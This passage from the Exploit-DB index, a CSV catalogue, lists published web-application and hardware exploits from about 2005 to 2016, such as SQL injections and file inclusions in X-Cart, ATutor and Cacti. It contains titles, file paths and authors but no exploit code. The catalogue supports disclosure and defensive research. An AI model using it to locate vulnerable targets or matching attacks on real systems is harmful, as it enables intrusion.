Injection",2005-05-28,NoSP,php,webapps, -25750,exploits/php/webapps/25750.txt,"NPDS 4.8 < 5.0 - 'faq.php?categories' Cross-Site Scripting",2005-05-28,NoSP,php,webapps, -25751,exploits/asp/webapps/25751.txt,"OS4E - 'login.asp' SQL Injection",2005-05-28,"Dj romty",asp,webapps, -25753,exploits/asp/webapps/25753.txt,"Hosting Controller 6.1 - 'resellerresources.asp?jresourceid' SQL Injection",2005-05-28,"GrayHatz Security Group",asp,webapps, -25754,exploits/asp/webapps/25754.txt,"Hosting Controller 6.1 - 'plandetails.asp' Information Disclosure",2005-05-28,"GrayHatz Security Group",asp,webapps, -25756,exploits/php/webapps/25756.txt,"India Software Solution Shopping Cart - SQL Injection",2005-05-28,Rayden,php,webapps, -25758,exploits/asp/webapps/25758.txt,"Hosting Controller 6.1 - User Profile Unauthorized Access",2005-05-30,"GrayHatz Security Group",asp,webapps, -40391,exploits/php/webapps/40391.txt,"WordPress Plugin Order Export Import for WooCommerce - Order Information Disclosure",2016-09-19,david-peltier,php,webapps,80 -25759,exploits/php/webapps/25759.txt,"Qualiteam X-Cart 4.0.8 - 'home.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25760,exploits/php/webapps/25760.txt,"Qualiteam X-Cart 4.0.8 - 'product.php' Multiple Cross-Site Scripting Vulnerabilities",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25761,exploits/php/webapps/25761.txt,"Qualiteam X-Cart 4.0.8 - 'error_message.php?id' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25762,exploits/php/webapps/25762.txt,"Qualiteam X-Cart 4.0.8 - 'help.php?section' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25763,exploits/php/webapps/25763.txt,"Qualiteam X-Cart 4.0.8 - 'orders.php?mode' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25764,exploits/php/webapps/25764.txt,"Qualiteam X-Cart 4.0.8 - 'register.php?mode' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25765,exploits/php/webapps/25765.txt,"Qualiteam X-Cart 4.0.8 - 'search.php?mode' Cross-Site Scripting",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25767,exploits/php/webapps/25767.txt,"Qualiteam X-Cart 4.0.8 - 'home.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25768,exploits/php/webapps/25768.txt,"Qualiteam X-Cart 4.0.8 - 'product.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25769,exploits/php/webapps/25769.txt,"Qualiteam X-Cart 4.0.8 - 'error_message.php?id' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25770,exploits/php/webapps/25770.txt,"Qualiteam X-Cart 4.0.8 - 'help.php?section' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25771,exploits/php/webapps/25771.txt,"Qualiteam X-Cart 4.0.8 - 'orders.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25772,exploits/php/webapps/25772.txt,"Qualiteam X-Cart 4.0.8 - 'register.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25773,exploits/php/webapps/25773.txt,"Qualiteam X-Cart 4.0.8 - 'search.php?mode' SQL Injection",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25774,exploits/php/webapps/25774.txt,"Qualiteam X-Cart 4.0.8 - 'giftcert.php' Multiple SQL Injections",2005-05-30,"CENSORED Search Vulnerabilities",php,webapps, -25819,exploits/php/webapps/25819.txt,"FusionBB 0.x - Multiple Input Validation Vulnerabilities",2005-06-13,"James Bercegay",php,webapps, -33411,exploits/php/webapps/33411.txt,"iSupport 1.8 - 'ticket_function.php' Multiple Cross-Site Scripting Vulnerabilities",2009-12-16,"Stink & Essandre",php,webapps, -33412,exploits/php/webapps/33412.txt,"iSupport 1.8 - 'index.php?which' Cross-Site Scripting",2009-12-16,"Stink & Essandre",php,webapps, -33413,exploits/php/webapps/33413.txt,"Pluxml-Blog 4.2 - '/core/admin/auth.php' Cross-Site Scripting",2009-12-17,Metropolis,php,webapps, -33416,exploits/php/webapps/33416.txt,"QuiXplorer 2.x - 'lang' Local File Inclusion",2009-12-17,"Juan Galiana Lara",php,webapps, -33417,exploits/php/webapps/33417.txt,"cPanel 11.x - 'fileop' Multiple Cross-Site Scripting Vulnerabilities",2009-12-17,RENO,php,webapps, -33418,exploits/php/webapps/33418.txt,"Joomla! Component com_joomportfolio - 'secid' SQL Injection",2009-12-17,"Fl0riX & Snakespc",php,webapps, -33419,exploits/php/webapps/33419.txt,"F3Site 2009 - '/mod/poll.php?GLOBALS[nlang]' Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps, -33420,exploits/php/webapps/33420.txt,"F3Site 2009 - '/mod/new.php?GLOBALS[nlang]' Traversal Local File Inclusion",2009-12-18,cr4wl3r,php,webapps, -40390,exploits/php/webapps/40390.php,"BuilderEngine 3.5.0 - Arbitrary File Upload",2016-09-19,metanubix,php,webapps,80 -33421,exploits/php/webapps/33421.txt,"Ampache 3.4.3 - 'login.php' Multiple SQL Injections",2009-12-18,R3d-D3V!L,php,webapps, -33422,exploits/php/webapps/33422.txt,"JBC Explorer 7.20 - 'arbre.php' Cross-Site Scripting",2009-12-20,Metropolis,php,webapps, -33424,exploits/php/webapps/33424.txt,"Kasseler CMS 1.3.4 Lite - Multiple Cross-Site Scripting Vulnerabilities",2009-12-21,Gamoscu,php,webapps, -33425,exploits/php/webapps/33425.py,"SPIP CMS < 2.0.23/ 2.1.22/3.0.9 - Privilege Escalation",2014-05-19,"Gregory Draperi",php,webapps,80 -25777,exploits/php/webapps/25777.txt,"PowerDownload 3.0.2/3.0.3 - IncDir Remote File Inclusion",2005-05-31,"SoulBlack Group",php,webapps, -25778,exploits/php/webapps/25778.txt,"Calendarix 0.8.20071118 - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2005-05-31,DarkBicho,php,webapps, -25779,exploits/php/webapps/25779.txt,"MyBulletinBoard (MyBB) RC4 - Multiple Cross-Site Scripting / SQL Injections",2005-05-31,"Alberto Trivero",php,webapps, -25780,exploits/asp/webapps/25780.txt,"JiRo's Upload System 1.0 - 'login.asp' SQL Injection",2005-06-01,Romty,asp,webapps, -25781,exploits/asp/webapps/25781.txt,"NEXTWEB (i)Site - 'login.asp' SQL Injection",2005-06-01,"Jim Pangalos",asp,webapps, -25783,exploits/asp/webapps/25783.txt,"Livingcolor Livingmailing 1.3 - 'login.asp' SQL Injection",2005-06-01,"Dj romty",asp,webapps, -25785,exploits/asp/webapps/25785.txt,"Liberum Help Desk 0.97.3 - Multiple SQL Injections",2005-06-02,"Dedi Dwianto",asp,webapps, -25786,exploits/php/webapps/25786.txt,"MWChat 6.7 - 'Start_Lobby.php' Remote File Inclusion",2005-06-03,Status-x,php,webapps, -25787,exploits/php/webapps/25787.txt,"LiteWEB Web Server 2.5 - Authentication Bypass",2005-06-03,"Ziv Kamir",php,webapps, -25788,exploits/php/webapps/25788.txt,"Popper Webmail 1.41 - 'ChildWindow.Inc.php' Remote File Inclusion",2005-06-03,"Leon Juranic",php,webapps, -25790,exploits/asp/webapps/25790.txt,"WWWeb Concepts Events System 1.0 - 'login.asp' SQL Injection",2005-06-06,Romty,asp,webapps, -25792,exploits/php/webapps/25792.txt,"YaPiG 0.9x - Local/Remote File Inclusion",2005-06-06,anonymous,php,webapps, -25793,exploits/php/webapps/25793.txt,"YaPiG 0.9x - 'view.php' Cross-Site Scripting",2005-06-06,anonymous,php,webapps, -25794,exploits/php/webapps/25794.txt,"YaPiG 0.9x - 'upload.php' Directory Traversal",2005-06-06,anonymous,php,webapps, -25795,exploits/asp/webapps/25795.txt,"Early Impact ProductCart 2.6/2.7 - 'viewPrd.asp?idcategory' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps, -25796,exploits/asp/webapps/25796.txt,"Early Impact ProductCart 2.6/2.7 - 'editCategories.asp?lid' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps, -25797,exploits/asp/webapps/25797.txt,"Early Impact ProductCart 2.6/2.7 - 'modCustomCardPaymentOpt.asp?idc' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps, -25798,exploits/asp/webapps/25798.txt,"Early Impact ProductCart 2.6/2.7 - 'OptionFieldsEdit.asp?idccr' SQL Injection",2005-06-06,"Dedi Dwianto",asp,webapps, -25799,exploits/php/webapps/25799.txt,"FlatNuke 2.5.x - 'index.php?where' Full Path Disclosure",2005-06-07,SecWatch,php,webapps, -25800,exploits/php/webapps/25800.txt,"FlatNuke 2.5.x - 'help.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-07,SecWatch,php,webapps, -25801,exploits/php/webapps/25801.php,"FlatNuke 2.5.x - 'referer.php' Crafted Referer Arbitrary PHP Code Execution",2005-06-07,SecWatch,php,webapps, -25803,exploits/php/webapps/25803.txt,"Cerberus Helpdesk 0.97.3/2.6.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-06-08,"Dedi Dwianto",php,webapps, -25804,exploits/asp/webapps/25804.txt,"Loki Download Manager 2.0 - 'default.asp' SQL Injection",2005-06-08,hack_912,asp,webapps, -25805,exploits/asp/webapps/25805.txt,"Loki Download Manager 2.0 - 'Catinfo.asp' SQL Injection",2005-06-08,hack_912,asp,webapps, -25806,exploits/php/webapps/25806.txt,"Invision Power Services Invision Gallery 1.0.1/1.3 - SQL Injection",2005-06-09,"James Bercegay",php,webapps, -25808,exploits/php/webapps/25808.txt,"Invision Community Blog 1.0/1.1 - Multiple Input Validation Vulnerabilities",2005-06-09,"James Bercegay",php,webapps, -25810,exploits/hardware/webapps/25810.py,"TP-Link WR842ND - Remote Multiple SSID Directory Traversals",2013-05-29,"Adam Simuntis",hardware,webapps, -25811,exploits/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,hardware,webapps, -25812,exploits/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps, -25813,exploits/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps, -25815,exploits/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps, -25826,exploits/php/webapps/25826.txt,"ATutor 1.4.3 - 'browse.php?show_course' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps, -25827,exploits/php/webapps/25827.txt,"ATutor 1.4.3 - 'contact.php?subject' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps, -25828,exploits/php/webapps/25828.txt,"ATutor 1.4.3 - 'content.php?cid' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps, -25829,exploits/php/webapps/25829.txt,"ATutor 1.4.3 - 'send_message.php?l' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps, -25830,exploits/php/webapps/25830.txt,"ATutor 1.4.3 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps, -25831,exploits/php/webapps/25831.txt,"ATutor 1.4.3 - '/inbox/index.php?view' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps, -25832,exploits/php/webapps/25832.txt,"ATutor 1.4.3 - 'tile.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps, -25833,exploits/php/webapps/25833.txt,"ATutor 1.4.3 - 'subscribe_forum.php?us' Cross-Site Scripting",2005-06-16,Lostmon,php,webapps, -25834,exploits/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-16,Lostmon,php,webapps, -25838,exploits/php/webapps/25838.pl,"Ultimate PHP Board 1.8/1.9 - Weak Password Encryption",2005-06-16,"Alberto Trivero",php,webapps, -25839,exploits/asp/webapps/25839.txt,"Cool Cafe Chat 1.2.1 - 'login.asp' SQL Injection",2005-06-16,"Morning Wood",asp,webapps, -25840,exploits/php/webapps/25840.txt,"osCommerce 2.1/2.2 - Multiple HTTP Response Splitting Vulnerabilities",2005-06-17,"James Bercegay",php,webapps, -25843,exploits/asp/webapps/25843.txt,"Ublog Reload 1.0.5 - 'index.asp' Multiple SQL Injections",2005-06-20,"Dedi Dwianto",asp,webapps, -25844,exploits/asp/webapps/25844.txt,"Ublog Reload 1.0.5 - 'blog_comment.asp?y' SQL Injection",2005-06-20,"Dedi Dwianto",asp,webapps, -25845,exploits/asp/webapps/25845.txt,"UApplication Ublog Reload 1.0.5 - 'Trackback.asp' Cross-Site Scripting",2005-06-20,"Dedi Dwianto",asp,webapps, -25846,exploits/php/webapps/25846.txt,"cPanel 9.1 - 'User' Cross-Site Scripting",2005-05-20,abducter_minds@yahoo.com,php,webapps, -25847,exploits/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart - 'login.asp' SQL Injection",2003-12-07,G00db0y,asp,webapps, -25848,exploits/php/webapps/25848.pl,"PAFaq beta4 - Database Unauthorized Access",2005-06-20,james,php,webapps, -25849,exploits/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation 'newvalue' / Remote Code Execution",2013-05-31,"CWH Underground",php,webapps, -26289,exploits/cgi/webapps/26289.txt,"Alkalay.Net (Multiple Scripts) - Remote Command Execution",2005-08-21,sullo@cirt.net,cgi,webapps, -26290,exploits/cgi/webapps/26290.txt,"PerlDiver 2.31 - 'Perldiver.cgi' Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps, -26291,exploits/asp/webapps/26291.txt,"Mall23 - 'AddItem.asp' SQL Injection",2005-08-21,SmOk3,asp,webapps, -25853,exploits/asp/webapps/25853.txt,"I-Gallery - Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",asp,webapps, -25854,exploits/php/webapps/25854.txt,"PAFaq - Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps, -25855,exploits/asp/webapps/25855.txt,"I-Gallery - Folder Argument Cross-Site Scripting",2005-06-20,"Seyed Hamid Kashfi",asp,webapps, -25856,exploits/php/webapps/25856.txt,"PAFaq - Administrator 'Username' SQL Injection",2005-06-20,"James Bercegay",php,webapps, -25857,exploits/php/webapps/25857.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Config_Settings.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps, -25858,exploits/asp/webapps/25858.txt,"DUware DUportal 3.4.3 Pro - Multiple SQL Injections",2005-06-22,"Dedi Dwianto",asp,webapps, -25859,exploits/php/webapps/25859.txt,"RaXnet Cacti 0.5/0.6/0.8 - 'Top_Graph_Header.php' Remote File Inclusion",2005-06-20,"Maciej Piotr Falkiewicz",php,webapps, -25860,exploits/php/webapps/25860.txt,"DUware DUamazon Pro 3.0/3.1 - 'type.asp?iType' SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps, -25861,exploits/php/webapps/25861.txt,"DUware DUamazon Pro 3.0/3.1 - 'productDelete.asp?iCat' SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps, -25862,exploits/php/webapps/25862.txt,"DUware DUamazon Pro 3.0/3.1 - 'productEdit.asp?iCat' SQL Injection",2005-06-22,"Dedi Dwianto",php,webapps, -25863,exploits/asp/webapps/25863.txt,"DUware DUamazon Pro 3.0/3.1 - 'catDelete.asp?iCat' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps, -25864,exploits/asp/webapps/25864.txt,"DUware DUamazon Pro 3.0/3.1 - 'review.asp?iPro' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps, -25865,exploits/asp/webapps/25865.txt,"DUware DUamazon Pro 3.0/3.1 - 'detail.asp?iSub' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps, -25866,exploits/asp/webapps/25866.txt,"DUware DUpaypal 3.0/3.1 - 'detail.asp?iPro' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps, -25867,exploits/asp/webapps/25867.txt,"DUware DUpaypal 3.0/3.1 - 'sub.asp?iSub' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps, -25868,exploits/asp/webapps/25868.txt,"DUware DUforum 3.0/3.1 - 'messages.asp?iMsg' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps, -25869,exploits/asp/webapps/25869.txt,"DUware DUforum 3.0/3.1 - 'post.asp?iFor' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps, -25870,exploits/asp/webapps/25870.txt,"DUware DUforum 3.0/3.1 - 'forums.asp?iFor' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps, -25871,exploits/asp/webapps/25871.txt,"DUware DUforum 3.0/3.1 - 'userEdit.asp?id' SQL Injection",2005-06-22,"Dedi Dwianto",asp,webapps, -25872,exploits/asp/webapps/25872.txt,"DUware DUclassmate 1.x - 'default.asp?iState' SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps, -25873,exploits/asp/webapps/25873.txt,"DUware DUclassmate 1.x - 'edit.asp?iPro' SQL Injection",2005-06-01,"Dedi Dwianto",asp,webapps, -25874,exploits/asp/webapps/25874.txt,"Ipswitch WhatsUp Professional 2005 SP1 - 'login.asp' SQL Injection",2005-06-22,anonymous,asp,webapps, -25875,exploits/php/webapps/25875.txt,"Whois.Cart 2.2.x - 'profile.php' Cross-Site Scripting",2005-06-23,"Elzar Stuffenbach",php,webapps, -25876,exploits/php/webapps/25876.txt,"CarLine Forum Russian Board 4.2 - 'menu_footer.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps, -25877,exploits/php/webapps/25877.txt,"CarLine Forum Russian Board 4.2 - IMG Tag Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps, -25878,exploits/php/webapps/25878.txt,"CarLine Forum Russian Board 4.2 - 'menu_header.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps, -25879,exploits/php/webapps/25879.txt,"CarLine Forum Russian Board 4.2 - 'menu_tema.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps, -25880,exploits/php/webapps/25880.txt,"CarLine Forum Russian Board 4.2 - 'search.php?text_poisk' Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps, -25881,exploits/php/webapps/25881.txt,"CarLine Forum Russian Board 4.2 - 'set.php?name_ig_array[]' Cross-Site Scripting",2005-06-23,1dt.w0lf,php,webapps, -25882,exploits/php/webapps/25882.txt,"CarLine Forum Russian Board 4.2 - 'reply.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps, -25884,exploits/php/webapps/25884.txt,"CarLine Forum Russian Board 4.2 - 'new.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps, -25885,exploits/php/webapps/25885.txt,"CarLine Forum Russian Board 4.2 - 'edit_msg.php' Multiple Cross-Site Scripting Vulnerabilities",2005-06-23,1dt.w0lf,php,webapps, -25886,exploits/php/webapps/25886.txt,"CarLine Forum Russian Board 4.2 - 'menu_header.php?table_sql' SQL Injection",2005-06-23,1dt.w0lf,php,webapps, -25887,exploits/php/webapps/25887.txt,"CarLine Forum Russian Board 4.2 - 'set.php?name_ig_array[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps, -25888,exploits/php/webapps/25888.txt,"CarLine Forum Russian Board 4.2 - 'reply_in.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps, -25889,exploits/php/webapps/25889.txt,"CarLine Forum Russian Board 4.2 - 'reply.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps, -25890,exploits/php/webapps/25890.txt,"CarLine Forum Russian Board 4.2 - 'new.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps, -25891,exploits/php/webapps/25891.txt,"CarLine Forum Russian Board 4.2 - 'edit_msg.php?name_ig_array1[1]' SQL Injection",2005-06-23,1dt.w0lf,php,webapps, -25892,exploits/php/webapps/25892.txt,"CarLine Forum Russian Board 4.2 - 'memory.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps, -25893,exploits/php/webapps/25893.txt,"CarLine Forum Russian Board 4.2 - 'line.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps, -25894,exploits/php/webapps/25894.txt,"CarLine Forum Russian Board 4.2 - 'in.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps, -25895,exploits/php/webapps/25895.txt,"CarLine Forum Russian Board 4.2 - 'enter.php' Multiple SQL Injections",2005-06-23,1dt.w0lf,php,webapps, -25897,exploits/php/webapps/25897.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'download.php?Number' SQL Injection",2005-06-24,"James Bercegay",php,webapps, -25898,exploits/php/webapps/25898.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'calendar.php' Multiple SQL Injections",2005-06-24,"James Bercegay",php,webapps, -25899,exploits/php/webapps/25899.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'modifypost.php?Number' SQL Injection",2005-06-24,"James Bercegay",php,webapps, -25900,exploits/php/webapps/25900.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'viewmessage.php?message' SQL Injection",2005-06-24,"James Bercegay",php,webapps, -25901,exploits/php/webapps/25901.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'addfav.php?main' SQL Injection",2005-06-24,"James Bercegay",php,webapps, -25902,exploits/php/webapps/25902.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'notifymod.php?Number' SQL Injection",2005-06-24,"James Bercegay",php,webapps, -25903,exploits/php/webapps/25903.txt,"UBBCentral UBB.Threads 5.5.1/6.x - 'grabnext.php?posted' SQL Injection",2005-06-24,"James Bercegay",php,webapps, -25904,exploits/php/webapps/25904.c,"K-COLLECT CSV_DB.CGI 1.0/i_DB.CGI 1.0 - Remote Command Execution",2005-06-24,blahplok,php,webapps, -25905,exploits/asp/webapps/25905.txt,"ASPNuke 0.80 - 'forgot_password.asp?email' Cross-Site Scripting",2005-06-27,"Alberto Trivero",asp,webapps, -25906,exploits/asp/webapps/25906.txt,"ASPNuke 0.80 - 'register.asp' Multiple Cross-Site Scripting Vulnerabilities",2005-06-27,"Alberto Trivero",asp,webapps, -25907,exploits/asp/webapps/25907.txt,"ASPNuke 0.80 - 'Language_Select.asp' HTTP Response Splitting",2005-06-27,"Alberto Trivero",asp,webapps, -25908,exploits/asp/webapps/25908.txt,"ASPPlayGround.NET 3.2 SR1 - Arbitrary File Upload",2005-06-27,Psycho,asp,webapps, -25909,exploits/php/webapps/25909.txt,"Mensajeitor 1.8.9 - 'IP' HTML Injection",2005-06-27,Megabyte,php,webapps, -25910,exploits/asp/webapps/25910.txt,"Community Server Forums - 'SearchResults.aspx' Cross-Site Scripting",2005-06-28,abducter_minds@yahoo.com,asp,webapps, -25913,exploits/asp/webapps/25913.txt,"Hosting Controller 6.1 - 'error.asp' Cross-Site Scripting",2005-06-28,"Ashiyane Digital Security Team",asp,webapps, -25914,exploits/asp/webapps/25914.txt,"Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' SQL Injection",2005-06-28,basher13,asp,webapps, -25915,exploits/php/webapps/25915.py,"PHD Help Desk 2.12 - SQL Injection",2013-06-03,drone,php,webapps, -25927,exploits/php/webapps/25927.pl,"RaXnet Cacti 0.5/0.6.x/0.8.x - 'Graph_Image.php' Remote Command Execution Variant",2005-07-01,"Alberto Trivero",php,webapps, -25918,exploits/cgi/webapps/25918.txt,"CGI-Club imTRBBS 1.0 - Remote Command Execution",2005-06-29,blahplok,cgi,webapps, -25919,exploits/php/webapps/25919.txt,"Phorum 5.0.11 - 'Read.php' SQL Injection",2004-10-24,"Positive Technologies",php,webapps, -25920,exploits/cgi/webapps/25920.pl,"Community Link Pro - 'login.cgi?File' Remote Command Execution",2005-06-29,spher3,cgi,webapps, -25922,exploits/asp/webapps/25922.txt,"CyberStrong EShop 4.2 - '20review.asp' SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps, -25923,exploits/asp/webapps/25923.txt,"CyberStrong eShop 4.2 - '10expand.asp' SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps, -25926,exploits/php/webapps/25926.txt,"osTicket 1.2/1.3 - 'view.php?inc' Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps, -25924,exploits/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal",2005-06-30,ActualMInd,asp,webapps, -25925,exploits/asp/webapps/25925.txt,"CyberStrong EShop 4.2 - '10browse.asp' SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps, -25928,exploits/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'calendar.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps, -25929,exploits/php/webapps/25929.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'popup.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps, -25930,exploits/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'header.inc.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps, -25931,exploits/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'datePicker.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps, -25932,exploits/php/webapps/25932.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'setupSQL.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps, -25934,exploits/php/webapps/25934.txt,"Plague News System 0.7 - 'CID' SQL Injection",2005-07-04,Easyex,php,webapps, -25935,exploits/php/webapps/25935.txt,"Plague News System 0.7 - 'CID' Cross-Site Scripting",2005-07-04,Easyex,php,webapps, -25937,exploits/php/webapps/25937.txt,"Plague News System 0.7 - 'delete.php' Access Restriction Bypass",2005-07-04,Easyex,php,webapps, -25938,exploits/php/webapps/25938.txt,"phpPgAdmin 3.x - Login Form Directory Traversal",2005-07-05,rznvynqqe@hushmail.com,php,webapps, -25939,exploits/cgi/webapps/25939.txt,"GlobalNoteScript 4.20 - 'Read.cgi' Remote Command Execution",2005-07-05,AcidCrash,cgi,webapps, -25940,exploits/php/webapps/25940.txt,"AutoIndex PHP Script 1.5.2 - 'index.php' Cross-Site Scripting",2005-07-05,mozako,php,webapps, -25941,exploits/php/webapps/25941.txt,"MyGuestbook 0.6.1 - 'Form.Inc.php3' Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps, -25942,exploits/php/webapps/25942.txt,"Jaws 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps, -25945,exploits/php/webapps/25945.txt,"phpWebSite 0.7.3/0.8.x/0.9.x - 'index.php' Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps, -25946,exploits/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps, -25950,exploits/cgi/webapps/25950.pl,"eRoom 6.0 PlugIn - Insecure File Download Handling",2005-07-06,c0ntex,cgi,webapps, -25951,exploits/php/webapps/25951.txt,"Elemental Software CartWIZ 1.20 - Multiple SQL Injections",2005-07-07,"Diabolic Crab",php,webapps, -25952,exploits/cgi/webapps/25952.txt,"Pngren 2.0.1 - 'Kaiseki.cgi' Remote Command Execution",2005-07-07,blahplok,cgi,webapps, -25953,exploits/asp/webapps/25953.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple SQL Injections",2005-07-07,"Diabolic Crab",asp,webapps, -25954,exploits/php/webapps/25954.txt,"phpAuction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps, -25955,exploits/php/webapps/25955.txt,"PhotoGal 1.0/1.5 - News_File Remote File Inclusion",2005-07-07,"skdaemon porra",php,webapps, -25956,exploits/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps, -25957,exploits/php/webapps/25957.txt,"PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps, -25958,exploits/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - 'SQL.CLS.php' SQL Injection",2005-07-10,Defa,php,webapps, -25959,exploits/php/webapps/25959.txt,"Spid 1.3 - 'lang_path' File Inclusion",2005-07-11,"skdaemon porra",php,webapps, -25960,exploits/php/webapps/25960.txt,"PPA 0.5.6 - 'ppa_root_path' File Inclusion",2005-07-10,"skdaemon porra",php,webapps, -25963,exploits/asp/webapps/25963.txt,"Dragonfly Commerce 1.0 - Multiple SQL Injections",2005-07-12,"Diabolic Crab",asp,webapps, -25964,exploits/php/webapps/25964.c,"PHPsFTPd 0.2/0.4 - 'Inc.login.php' Privilege Escalation",2005-07-11,"Stefan Lochbihler",php,webapps, -25965,exploits/asp/webapps/25965.txt,"DVBBS 7.1 - 'ShowErr.asp' Cross-Site Scripting",2005-07-12,rUnViRuS,asp,webapps, -25968,exploits/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - File Disclosure",2013-06-05,"Todor Donev",hardware,webapps, -25969,exploits/hardware/webapps/25969.txt,"NETGEAR WPN824v3 - Unauthorized Configuration Download",2013-06-05,"Jens Regel",hardware,webapps, -25971,exploits/php/webapps/25971.txt,"Cuppa CMS - '/alertConfigField.php' Local/Remote File 